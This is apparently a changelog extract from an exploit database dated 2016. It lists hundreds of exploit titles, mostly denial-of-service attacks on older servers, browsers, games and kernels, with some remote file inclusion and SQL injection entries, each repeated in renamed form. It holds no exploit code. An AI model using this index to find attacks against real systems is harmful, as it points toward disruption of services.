DB: 2016-08-18
4 new exploits Apache 2.0.44 (Linux) - Remote Denial of Service Exploit Apache 2.0.44 (Linux) - Remote Denial of Service Chindi Server 1.0 - Denial of Service Exploit Chindi Server 1.0 - Denial of Service Xeneo Web Server 2.2.9.0 - Denial of Service Exploit Xeneo Web Server 2.2.9.0 - Denial of Service Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Cisco IOS - IPv4 Packets Denial of Service Exploit Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit Cisco IOS - (using hping) Remote Denial of Service Exploit Cisco IOS - IPv4 Packets Denial of Service Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Microsoft Windows 2000 - RPC DCOM Interface Denial of Service Cisco IOS - (using hping) Remote Denial of Service Linux Kernel 2.4.20 - decode_fh Denial of Service Exploit Linux Kernel 2.4.20 - decode_fh Denial of Service Trillian 0.74 - Remote Denial of Service Exploit Trillian 0.74 - Remote Denial of Service Piolet Client 1.05 - Remote Denial of Service Exploit Piolet Client 1.05 - Remote Denial of Service Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043) Microsoft Windows Messenger Service - Denial of Service (MS03-043) wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Eznet 3.5.0 - Remote Stack Overflow / Denial of Service Exploit Eznet 3.5.0 - Remote Stack Overflow / Denial of Service Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011) Microsoft Windows IIS - SSL Remote Denial of Service (MS04-011) Microsoft Windows - 'Jolt2.c' Denial of Service Exploit Microsoft Windows - 'Jolt2.c' Denial of Service ProFTPD 1.2.0pre10 - Remote Denial of Service Exploit ProFTPD 1.2.0pre10 - Remote Denial of Service APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit APC UPS 3.7.2 - (apcupsd) Local Denial of Service Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit Novell BorderManager Enterprise Edition 3.5 - Denial of Service Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service Exploit Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service Emule 0.42e Remote Denial of Service Exploit Emule 0.42e Remote Denial of Service Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local DoS Exploit Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service Ping of Death Remote Denial of Service Exploit Ping of Death Remote Denial of Service Microsoft Windows NT Crash with an Extra Long Username DoS Exploit Microsoft Windows NT Crash with an Extra Long Username Denial of Service TCP SYN - 'bang.c' Denial of Service Exploit UDP Stress Tester Denial of Service Exploit TCP SYN - 'bang.c' Denial of Service UDP Stress Tester Denial of Service OverByte ICS FTP Server Remote Denial of Service Exploit OverByte ICS FTP Server Remote Denial of Service Xitami Web Server Denial of Service Exploit Xitami Web Server Denial of Service Microsoft Internet Explorer - Denial of Service Exploit (11 bytes) Microsoft Windows SMS 2.0 - Denial of Service Exploit Microsoft Internet Explorer - Denial of Service (11 bytes) Microsoft Windows SMS 2.0 - Denial of Service Citadel/UX Remote Denial of Service Exploit (PoC) Citadel/UX Remote Denial of Service (PoC) psyBNC 2.3 - Denial of Service Exploit psyBNC 2.3 - Denial of Service Microsoft Messenger - Denial of Service Exploit (MS03-043) (Linux) Microsoft Messenger - Denial of Service (MS03-043) (Linux) BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit BadBlue 2.52 Web Server - Multiple Connections Denial of Service Painkiller 1.3.1 - Denial of Service Exploit Easy File Sharing Webserver 1.25 - Denial of Service Exploit Painkiller 1.3.1 - Denial of Service Easy File Sharing Webserver 1.25 - Denial of Service WFTPD Pro Server 3.21 MLST Remote Denial of Service Exploit CesarFTP Server Long Command Denial of Service Exploit Ground Control 1.0.0.7 - (Server/Client) Denial of Service Exploit WFTPD Pro Server 3.21 MLST Remote Denial of Service CesarFTP Server Long Command Denial of Service Ground Control 1.0.0.7 - (Server/Client) Denial of Service Call of Duty 1.4 - Denial of Service Exploit Call of Duty 1.4 - Denial of Service Serv-U < 5.2 - Remote Denial of Service Exploit Serv-U < 5.2 - Remote Denial of Service Pigeon Server 3.02.0143 - Denial of Service Exploit Pigeon Server 3.02.0143 - Denial of Service Emulive Server4 7560 - Remote Denial of Service Exploit Emulive Server4 7560 - Remote Denial of Service PopMessenger 1.60 - Remote Denial of Service Exploit PopMessenger 1.60 - Remote Denial of Service MyServer 0.7.1 - (POST) Denial of Service Exploit MyServer 0.7.1 - (POST) Denial of Service MSSQL 7.0 - Remote Denial of Service Exploit MSSQL 7.0 - Remote Denial of Service Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) Microsoft Windows NNTP Service (XPAT) Denial of Service (MS04-036) Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030) Microsoft Windows IIS - WebDAV XML Denial of Service (MS04-030) BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service BaSoMail - Multiple Buffer Overflow Denial of Service Exploit BaSoMail - Multiple Buffer Overflow Denial of Service Master of Orion III 1.2.5 - Denial of Service Exploit Master of Orion III 1.2.5 - Denial of Service Alpha Black Zero 1.04 - Remote Denial of Service Exploit Alpha Black Zero 1.04 - Remote Denial of Service Flash Messaging 5.2.0g - Remote Denial of Service Exploit Flash Messaging 5.2.0g - Remote Denial of Service WinFTP Server 1.6 - Denial of Service Exploit Kerio Personal Firewall 4.1.1 - Multiple IP Options DoS Exploit WinFTP Server 1.6 - Denial of Service Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service NetNote Server 2.2 build 230 - Crafted String DoS Exploit NetNote Server 2.2 build 230 - Crafted String Denial of Service Secure Network Messenger 1.4.2 - Denial of Service Exploit Secure Network Messenger 1.4.2 - Denial of Service Soldier of Fortune II 1.3 Server/Client - Denial of Service Exploit Soldier of Fortune II 1.3 Server/Client - Denial of Service Star Wars Battlefront 1.1 - Fake Players Denial of Service Exploit Star Wars Battlefront 1.1 - Fake Players Denial of Service 3Dmax 6.x backburner Manager 2.2 - Denial of Service Exploit 3Dmax 6.x backburner Manager 2.2 - Denial of Service Jana Server 2.4.4 - (http/pna) Denial of Service Exploit Jana Server 2.4.4 - (http/pna) Denial of Service Neverwinter Nights special Fake Players Denial of Service Exploit Kreed 1.05 - Format String / Denial of Service Exploit Neverwinter Nights special Fake Players Denial of Service Kreed 1.05 - Format String / Denial of Service Codename Eagle 1.42 - Socket Unreacheable DoS Exploit Codename Eagle 1.42 - Socket Unreacheable Denial of Service Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit Linux Kernel 2.4.28 / 2.6.9 - scm_send Local Denial of Service Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service SOLDNER Secret Wars 30830 - Denial of Service Exploit SOLDNER Secret Wars 30830 - Denial of Service iWebNegar 1.1 - Configuration Nullification Denial of Service Exploit iWebNegar 1.1 - Configuration Nullification Denial of Service Gore 1.50 - Socket Unreacheable Denial of Service Exploit Gore 1.50 - Socket Unreacheable Denial of Service TinyWeb 1.9 - Denial of Service Exploit TinyWeb 1.9 - Denial of Service ngIRCd 0.8.1 - Remote Denial of Service Exploit (2) ngIRCd 0.8.1 - Remote Denial of Service (2) Foxmail 2.0 - (MAIL FROM:) Denial of Service Exploit Foxmail 2.0 - (MAIL FROM:) Denial of Service Mac OS X AppleFileServer Remote Denial of Service Exploit Mac OS X AppleFileServer Remote Denial of Service webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service Exploit webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service wu-ftpd 2.6.2 - File Globbing Denial of Service Exploit Knet 1.04c - Buffer Overflow Denial of Service Exploit wu-ftpd 2.6.2 - File Globbing Denial of Service Knet 1.04c - Buffer Overflow Denial of Service Scrapland 1.0 - Server Termination Denial of Service Exploit Scrapland 1.0 - Server Termination Denial of Service Apache 2.0.52 - HTTP GET request Denial of Service Exploit Apache 2.0.52 - HTTP GET request Denial of Service Microsoft Windows 2003/XP - Remote Denial of Service Exploit Microsoft Windows 2003/XP - Remote Denial of Service OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Freeciv Server 2.0.0beta8 - Denial of Service Exploit Freeciv Server 2.0.0beta8 - Denial of Service PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Exploit MailEnable 1.8 - Remote Format String Denial of Service Exploit phpDEV5 - System-Call Local Denial of Service Exploit PlatinumFTP 1.0.18 - Multiple Remote Denial of Service MailEnable 1.8 - Remote Format String Denial of Service phpDEV5 - System-Call Local Denial of Service MCPWS Personal WebServer 1.3.21 - Denial of Service Exploit MCPWS Personal WebServer 1.3.21 - Denial of Service Ocean FTP Server 1.00 - Denial of Service Exploit Ocean FTP Server 1.00 - Denial of Service SPECTral Personal SMTP Server 0.4.2 - Denial of Service Exploit SPECTral Personal SMTP Server 0.4.2 - Denial of Service Linux Kernel 2.6.10 - Local Denial of Service Exploit Linux Kernel 2.6.10 - Local Denial of Service ArGoSoft FTP Server 1.4.2.8 - Denial of Service Exploit ArGoSoft FTP Server 1.4.2.8 - Denial of Service Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service Exploit Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service MailEnable Enterprise 1.x - SMTP Remote Denial of Service Exploit MailEnable Enterprise 1.x - SMTP Remote Denial of Service Yager 5.24 - Multiple Denial of Service Exploit Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019) Yager 5.24 - Multiple Denial of Service Microsoft Windows - Malformed IP Options Denial of Service (MS05-019) PostgreSQL 8.01 - Remote Reboot Denial of Service Exploit PostgreSQL 8.01 - Remote Reboot Denial of Service Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service Exploit Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Exploit Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Exploit Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop DoS Exploit Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop Denial of Service Ashley's Web Server Denial of Service Exploit Ashley's Web Server Denial of Service DataTrac Activity Console Denial of Service Exploit Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service Exploit DataTrac Activity Console Denial of Service Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service Remote File Manager 1.0 - Denial of Service Exploit Remote File Manager 1.0 - Denial of Service Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit Microsoft Windows 2003/XP - IPv6 Remote Denial of Service TCP TIMESTAMPS Denial of Service Exploit TCP TIMESTAMPS Denial of Service FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit FutureSoft TFTP Server 2000 - Remote Denial of Service Tcpdump bgp_update_print Remote Denial of Service Exploit Tcpdump bgp_update_print Remote Denial of Service TCP-IP Datalook 1.3 - Local Denial of Service Exploit TCP-IP Datalook 1.3 - Local Denial of Service UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection Exploit TCP Chat (TCPX) 1.0 - Denial of Service Exploit TCP Chat (TCPX) 1.0 - Denial of Service PrivaShare 1.3 - Denial of Service Exploit AnalogX SimpleServer:WWW 1.05 - Denial of Service Exploit PrivaShare 1.3 - Denial of Service AnalogX SimpleServer:WWW 1.05 - Denial of Service Remote File Explorer 1.0 - Denial of Service Exploit wMailServer 1.0 - Remote Denial of Service Exploit Remote File Explorer 1.0 - Denial of Service wMailServer 1.0 - Remote Denial of Service Microsoft Windows Netman Service Local Denial of Service Exploit NetPanzer 0.8 - Remote Denial of Service Exploit Microsoft Windows Netman Service Local Denial of Service NetPanzer 0.8 - Remote Denial of Service Remote Control Server 1.6.2 - Denial of Service Exploit Remote Control Server 1.6.2 - Denial of Service DzSoft PHP Editor 3.1.2.8 - Denial of Service Exploit DzSoft PHP Editor 3.1.2.8 - Denial of Service Intruder Client 1.00 - Remote Command Execution & DoS Exploit Intruder Client 1.00 - Remote Command Execution & Denial of Service FTPshell Server 3.38 - Remote Denial of Service Exploit FTPshell Server 3.38 - Remote Denial of Service BusinessMail Server 4.60.00 - Remote Denial of Service Exploit BusinessMail Server 4.60.00 - Remote Denial of Service Quick 'n EasY 3.0 FTP Server Remote Denial of Service Exploit Quick 'n EasY 3.0 FTP Server Remote Denial of Service Acunetix HTTP Sniffer - Denial of Service Exploit Acunetix HTTP Sniffer - Denial of Service Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel DoS Exploit Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel Denial of Service Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Chris Moneymakers World Poker Championship 1.0 DoS Exploit GTChat 0.95 Alpha - Remote Denial of Service Exploit Chris Moneymakers World Poker Championship 1.0 Denial of Service GTChat 0.95 Alpha - Remote Denial of Service GoodTech SMTP Server 5.14 - Denial of Service Exploit IA eMailServer Corporate Edition 5.2.2 - DoS Exploit GoodTech SMTP Server 5.14 - Denial of Service IA eMailServer Corporate Edition 5.2.2 - Denial of Service GTChat 0.95 Alpha - (adduser) Remote Denial of Service Exploit Ventrilo 2.3.0 - Remote Denial of Service Exploit (all platforms) GTChat 0.95 Alpha - (adduser) Remote Denial of Service Ventrilo 2.3.0 - Remote Denial of Service (all platforms) Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service P2P Pro 1.0 - (command) Denial of Service Exploit P2P Pro 1.0 - (command) Denial of Service CUPS Server 1.1 - (Get Request) Denial of Service Exploit CUPS Server 1.1 - (Get Request) Denial of Service BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service Exploit BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service COOL! Remote Control 1.12 - Remote Denial of Service Exploit Snort 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit COOL! Remote Control 1.12 - Remote Denial of Service Snort 2.4.0 SACK TCP Option Error Handling Denial of Service Stoney FTPd Denial of Service Exploit (rxBot mods ftpd) Stoney FTPd Denial of Service (rxBot mods ftpd) Fastream NETFile Web Server 7.1.2 - (HEAD) DoS Exploit Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service MCCS (Multi-Computer Control Systems) Command DoS Exploit MCCS (Multi-Computer Control Systems) Command Denial of Service Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service Exploit Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service Virtools Web Player 3.0.0.100 - Buffer Overflow DoS Exploit Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service RBExplorer 1.0 - (Hijacking Command) Denial of Service Exploit RBExplorer 1.0 - (Hijacking Command) Denial of Service Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) Denial of Service Exploit Opera 8.02 - Remote Denial of Service Exploit (1) Opera 8.02 - Remote Denial of Service Exploit (2) Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) Denial of Service Opera 8.02 - Remote Denial of Service (1) Opera 8.02 - Remote Denial of Service (2) Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) Denial of Service Exploit Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) Denial of Service Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) Microsoft Windows Plug-and-Play (Umpnpmgr.dll) Denial of Service (MS05-047) Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2) Microsoft Windows Plug-and-Play (Umpnpmgr.dll) Denial of Service (MS05-047) (2) Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service Exploit Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service Battle Carry .005 Socket Termination Denial of Service Exploit Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Exploit FlatFrag 0.3 - Buffer Overflow / Denial of Service Exploit Battle Carry .005 Socket Termination Denial of Service Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service FlatFrag 0.3 - Buffer Overflow / Denial of Service Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service Exploit Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit FreeFTPD 1.0.10 - (PORT Command) Denial of Service Exploit Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service FreeFTPD 1.0.10 - (PORT Command) Denial of Service Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) Xaraya 1.0.0 RC4 - create() Denial of Service Exploit Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053) Microsoft Windows Metafile (gdi32.dll) Denial of Service (MS05-053) Xaraya 1.0.0 RC4 - create() Denial of Service Microsoft Windows Metafile - (mtNoObjects) Denial of Service (MS05-053) SugarSuite Open Source 4.0beta Remote Code Execution Exploit SugarSuite Open Source 4.0beta - Remote Code Execution Exploit Macromedia Flash Media Server 2 - Remote Denial of Service Exploit Macromedia Flash Media Server 2 - Remote Denial of Service Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (Perl) Microsoft Windows IIS - Malformed HTTP Request Denial of Service Microsoft Windows IIS - Malformed HTTP Request Denial of Service (Perl) BZFlag 2.0.4 - (undelimited string) Denial of Service Exploit BZFlag 2.0.4 - (undelimited string) Denial of Service Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Exploit Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp) Microsoft Windows IIS - Malformed HTTP Request Denial of Service (cpp) BlueCoat WinProxy 6.0 R1c (GET Request) Denial of Service Exploit BlueCoat WinProxy 6.0 R1c (GET Request) Denial of Service Cisco IP Phone 7940 - (Reboot) Denial of Service Exploit Cisco IP Phone 7940 - (Reboot) Denial of Service Cerberus FTP Server 2.32 - Denial of Service Exploit Cerberus FTP Server 2.32 - Denial of Service Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit Sony/Ericsson Bluetooth (Reset Display) Denial of Service Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service Exploit Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service Invision Power Board 2.1.4 - (Register Users) Denial of Service Exploit Invision Power Board 2.1.4 - (Register Users) Denial of Service D-Link Wireless Access Point (Fragmented UDP) DoS Exploit D-Link Wireless Access Point (Fragmented UDP) Denial of Service PunBB 2.0.10 - (Register Multiple Users) Denial of Service Exploit PunBB 2.0.10 - (Register Multiple Users) Denial of Service Lansuite 2.1.0 Beta (fid) SQL Injection Exploit Lansuite 2.1.0 Beta - (fid) SQL Injection Exploit FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service LieroX 0.62b Remote Server/Client Denial of Service Exploit LieroX 0.62b Remote Server/Client Denial of Service Guppy 4.5.11 - (Delete Databases) Remote Denial of Service Exploit Guppy 4.5.11 - (Delete Databases) Remote Denial of Service Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service Exploit Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2) Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2) Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit csDoom 0.7 - Multiple Vulnerabilities/Denial of Service Exploit Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service csDoom 0.7 - Multiple Vulnerabilities/Denial of Service Plogger Beta 2.1 Administrative Credentials Disclosure Exploit Plogger Beta 2.1 - Administrative Credentials Disclosure Exploit Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Neon Responder 5.4 - (Clock Synchronization) Denial of Service Exploit Neon Responder 5.4 - (Clock Synchronization) Denial of Service Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit OCE 3121/3122 Printer (parser.exe) Denial of Service phpMyAgenda 3.0 Final - (rootagenda) Remote Include phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion Empire 4.3.2 - (strncat) Denial of Service Exploit Genecys 0.2 - (BoF/NULL pointer) Denial of Service Exploit Empire 4.3.2 - (strncat) Denial of Service Genecys 0.2 - (BoF/NULL pointer) Denial of Service GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service Exploit phpBazar 2.1.0 - Remote File Include / Auth Bypass Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service phpBazar 2.1.0 - Remote File Inclusion / Auth Bypass portmap 5 beta (Set/Dump) Local Denial of Service Exploit portmap 5 beta - (Set/Dump) Local Denial of Service Back-End CMS 0.7.2.2 - (BE_config.php) Remote Include Back-End CMS 0.7.2.2 - (BE_config.php) Remote File Inclusion tinyBB 0.3 - Remote File Include / SQL Injection tinyBB 0.3 -Remote File Inclusion / SQL Injection F@cile Interactive Web 0.8x - Remote File Include / XSS F@cile Interactive Web 0.8x - Remote File Inclusion / XSS PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions PHP-Nuke 7.9 Final - (phpbb_root_path) Remote File Inclusions LifeType 1.0.4 - Multiple Vulnerabilities LifeType 1.0.4 - SQL Injection Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include Back-End CMS 0.7.2.1 - (jpcache.php) Remote File Inclusion Opera Web Browser 9.00 - (iframe) Remote Denial of Service Exploit Opera Web Browser 9.00 - (iframe) Remote Denial of Service ImgSvr 0.6.5 - (long http post) Denial of Service Exploit ImgSvr 0.6.5 - (long http post) Denial of Service SimpleBoard Mambo Component 1.1.0 - Remote Include com_forum Mambo Component 1.2.4RC3 - Remote Include SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion com_videodb Mambo Component 0.3en Remote Include com_videodb Mambo Component 0.3en Remote File Inclusion HTMLArea3 Mambo Module 1.5 - Remote Include Sitemap Mambo Component 2.0.0 - Remote Include pollxt Mambo Component 1.22.07 - Remote Include HTMLArea3 Mambo Module 1.5 - Remote File Inclusion Sitemap Mambo Component 2.0.0 - Remote File Inclusion pollxt Mambo Component 1.22.07 - Remote File Inclusion D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC) D-Link Router UPNP Stack Overflow Denial of Service (PoC) MoSpray Mambo Component 18RC1 - Remote Include ArticlesOne 07232006 - (page) Remote Include Mam-Moodle Mambo Component alpha Remote Inclusion MoSpray Mambo Component 18RC1 - Remote File Inclusion ArticlesOne 07232006 - (page) Remote File Inclusion Mam-Moodle Mambo Component alpha - Remote Inclusion Mambo User Home Pages Component 0.5 - Remote Include Mambo User Home Pages Component 0.5 - Remote File Inclusion Joomla LMO Component 1.0b2 - Remote Include Joomla LMO Component 1.0b2 - Remote File Inclusion SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote Include XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP) Joomla JD-Wiki Component 1.0.2 - Remote Include SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion XChat 2.6.7 - (Windows) Remote Denial of Service (PHP) Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion phpCC 4.2 beta (base_dir) Remote File Inclusion phpCC 4.2 beta - (base_dir) Remote File Inclusion Visual Events Calendar 1.1 - (cfg_dir) Remote Include Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl) XChat 2.6.7 - (Windows) Remote Denial of Service (Perl) See-Commerce 1.0.625 - (owimg.php3) Remote Include PocketPC Mms Composer (WAPPush) Denial of Service Exploit See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion PocketPC Mms Composer (WAPPush) Denial of Service Mambo Remository Component 3.25 - Remote Include Mambo Remository Component 3.25 - Remote File Inclusion Joomla Webring Component 1.0 - Remote Include Joomla Webring Component 1.0 - Remote File Inclusion Opera 9 - IRC Client Remote Denial of Service Exploit Opera 9 IRC Client - Remote Denial of Service Exploit (Python) Opera 9 - IRC Client Remote Denial of Service Opera 9 IRC Client - Remote Denial of Service (Python) Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC Microsoft Windows PNG File IHDR Block Denial of Service PoC Mambo CopperminePhotoGalery Component Remote Include Mambo CopperminePhotoGalery Component Remote File Inclusion WTcom 0.2.4-alpha (torrents.php) SQL Injection WTcom 0.2.4-alpha - (torrents.php) SQL Injection Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (1) Microsoft Windows - PNG File IHDR Block Denial of Service PoC (1) Joomla Artlinks Component 1.0b4 - Remote Include Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (2) PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote Include Joomla Artlinks Component 1.0b4 - Remote File Inclusion Microsoft Windows - PNG File IHDR Block Denial of Service PoC (2) PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion Mambo MamboWiki Component 0.9.6 - Remote Include Joomla Link Directory Component 1.0.3 - Remote Include Mambo MamboWiki Component 0.9.6 - Remote File Inclusion Joomla Link Directory Component 1.0.3 - Remote File Inclusion PHlyMail Lite 3.4.4 - (folderprops.php) Remote Include (2) PHlyMail Lite 3.4.4 - (folderprops.php) Remote File Inclusion (2) Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service Exploit Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service 2Wire Modems/Routers CRLF - Denial of Service Exploit 2Wire Modems/Routers CRLF - Denial of Service Integramod Portal 2.x - (functions_portal.php) Remote Include Exploit VistaBB 2.x - (functions_mod_user.php) Remote Include Exploit Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion Exploit VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion Exploit phpCOIN 1.2.3 - (session_set.php) Remote Include phpCOIN 1.2.3 - (session_set.php) Remote File Inclusion Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote Include Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote Include PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion Web Server Creator 0.1 - (l) Remote Include Web Server Creator 0.1 - (l) Remote File Inclusion Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service Exploit Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service mcGalleryPRO 2006 - (path_to_folder) Remote Include MiniPort@l 0.1.5 beta (skiny) Remote File Inclusion OPENi-CMS 1.0.1beta (config) Remote File Inclusion mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion MiniPort@l 0.1.5 beta - (skiny) Remote File Inclusion OPENi-CMS 1.0.1beta - (config) Remote File Inclusion Microsoft Internet Explorer (VML) Remote Denial of Service Exploit PoC Microsoft Internet Explorer (VML) Remote Denial of Service PoC OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service Exploit OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service VAMP Webmail 2.0beta1 - (yesno.phtml) Remote Include VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion TribunaLibre 3.12 Beta (ftag.php) Remote File Inclusion TribunaLibre 3.12 Beta - (ftag.php) Remote File Inclusion FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - 